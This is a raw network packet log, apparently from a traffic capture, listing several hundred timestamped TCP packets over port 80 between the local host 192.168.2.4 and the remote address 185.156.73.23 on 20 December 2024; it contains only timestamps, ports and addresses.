                                                                              Dec 20, 2024 16:28:20.467278004 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.467962027 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.467973948 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.468004942 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.468028069 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.468713045 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.468781948 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.468805075 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.468842983 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.469532013 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.469577074 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.469837904 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.469875097 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.470312119 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.470350027 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.470427036 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.470458984 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.471147060 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.471185923 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.471271992 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.471308947 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.471941948 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.472002983 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.472055912 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.472670078 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.472714901 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.472733974 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.472785950 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.473663092 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.473714113 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.473732948 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.473769903 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.474353075 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.474402905 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.474545002 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.474597931 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.475117922 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.475167036 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.475265980 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.475346088 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.475982904 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.476031065 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.476365089 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.476409912 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.476759911 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.476798058 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.476927042 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.476964951 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.477567911 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.477621078 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.478005886 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.478053093 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.478291988 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.478373051 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.478441954 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.478480101 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.479099989 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.479147911 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.479253054 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.479334116 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.479935884 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.479984999 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.480043888 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.480077982 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.480751991 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.480920076 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.480998039 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.481038094 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.481534004 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.481616974 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.481669903 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.481817961 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.482489109 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.482580900 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.482633114 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.483150959 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.483222961 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.483347893 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.483403921 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.483964920 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.484024048 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.484078884 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.484117985 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.484759092 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.484874010 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.484945059 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.485551119 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.485610008 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.485680103 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.485728025 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.486350060 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.486462116 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.486516953 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.487158060 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.487265110 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.487339020 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.487498045 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.543843031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.543893099 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.544034004 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.544300079 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.544362068 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.544989109 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.545023918 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.545099974 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.545142889 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.545195103 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.545850039 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.545907974 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.546344995 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.546406031 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.546576023 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.546647072 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.547246933 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.547435045 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.547472000 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.547493935 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.547522068 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.548310995 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.548403978 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.548461914 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.549060106 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.549125910 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.549186945 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.549236059 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.549851894 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.549922943 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.550266981 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.550333977 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.550570011 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.550709009 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.551141024 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.551203012 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.551404953 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.551462889 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.551536083 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.551666975 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.552181005 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.552299976 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.552593946 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.552639008 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.553034067 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.553067923 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.553097963 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.553127050 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.553865910 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.553922892 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.577630043 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.577827930 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.577980995 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.578006983 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.578056097 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.578119993 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.578819990 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.578879118 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.579030991 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.579087973 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.579739094 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.579792976 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.579854012 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.579904079 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.580441952 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.580496073 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.580552101 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.580600023 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.581190109 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.581245899 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.581434965 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.581490993 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.581981897 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.582041979 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.582355976 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.582422018 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.582807064 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.582863092 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.583033085 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.583089113 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.583724022 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.583832979 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.583895922 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.583950996 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.584398031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.584482908 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.584541082 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.584594011 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.585196972 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.585259914 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.586123943 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.586158991 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.586189032 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.586219072 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.586256981 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.586345911 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.586800098 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.586857080 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.586910009 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.586963892 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.587656021 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.587713957 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.658668041 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.658883095 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.658904076 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.658951044 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.659008980 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.659020901 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.659061909 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.659997940 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.660042048 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.660259008 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.660300016 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.660641909 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.660684109 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.660968065 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.661401033 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.661451101 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.661911011 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.661968946 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.662189007 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.662230015 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.662744045 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.662782907 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.663007975 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.663048029 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.663187027 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.663229942 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.663897038 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.663938046 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.664390087 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.664431095 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.664680004 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.664690971 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.664721012 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.665389061 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.665431976 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.665570021 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.665710926 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.666258097 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.666299105 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.666598082 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.666635036 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.667062998 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.667078018 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.667100906 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.667118073 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.667788982 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.667860985 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.667891026 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.667927980 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.668628931 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.668664932 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.668788910 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.668828964 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.669450998 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.669492006 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.669579029 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.669619083 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.670208931 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.670248985 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.670399904 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.670439005 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.671020031 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.671168089 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.671206951 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.672080040 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.672121048 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.672158957 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.672193050 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.672729015 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.672771931 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.672833920 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.672869921 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.673768044 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.673805952 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.674316883 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.674367905 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.674616098 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.674628019 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.674669981 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.675338984 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.675381899 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.675471067 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.675509930 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.675993919 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.676033974 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.676484108 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.676522017 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.676681995 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.676693916 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.676724911 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.677459955 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.677501917 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.677963018 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.678000927 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.678292990 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.678304911 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.678335905 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.679053068 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.679092884 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.679227114 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.679265022 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.735862017 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.735984087 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.736222029 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.736273050 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.736442089 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.736453056 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.736490965 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.736707926 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.736753941 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.737260103 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.737307072 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.737554073 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.737597942 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.737977028 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.738020897 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.738172054 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.738214016 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.738789082 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.738835096 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.738953114 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.738996983 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.739578009 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.739624023 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.740041971 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.740086079 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.740408897 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.740453005 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.740547895 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.740592003 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.741245985 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.741292953 CET4973080192.168.2.4185.156.73.23
                                                                              Dec 20, 2024 16:28:20.741430998 CET8049730185.156.73.23192.168.2.4
                                                                              Dec 20, 2024 16:28:20.741481066 CET4973080192.168.2.4185.156.73.23
